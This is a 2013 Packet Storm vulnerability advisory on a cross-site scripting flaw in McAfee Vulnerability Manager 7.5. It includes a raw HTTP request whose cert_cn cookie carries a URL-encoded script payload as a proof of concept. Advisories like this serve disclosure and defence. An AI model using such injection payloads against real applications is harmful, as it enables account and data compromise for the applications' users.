McAfee Vulnerability Manager 7.5 Cross Site Scripting

2013-03-08T00:00:00
ID PACKETSTORM:120721
Type packetstorm
Reporter Asheesh Kumar Mani Tripathi
Modified 2013-03-08T00:00:00

Description

                                        
                                            `================================================================================================================================================================  
  
McAfee® Vulnerability Manager 7.5 cross-site scripting (XSS) Vulnerability  
================================================================================================================================================================  
  
  
#Date- 8/3/2013  
  
# code by Asheesh kumar Mani Tripathi  
  
  
  
# Credit by Asheesh Anaconda  
  
  
  
#Vulnerbility  
McAfee® Vulnerability Manager 7.5 is prone to an cross-site scripting (XSS) Vulnerability because the application fails to properly   
sanitize user-supplied input   
  
#Impact  
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities   
  
  
========================================================================================================================  
  
Request  
========================================================================================================================  
  
  
GET /index.exp HTTP/1.1  
Cookie: identity=p805oa53c0dab5vpcv1da30me7; cert_cn=%27%22%28%29%26%251%3CScRiPt %3Eprompt%28920847%29%3C%2FScRiPt%3E; remember=remember  
Host: 172.28.1.1  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)  
Accept: */*  
  
`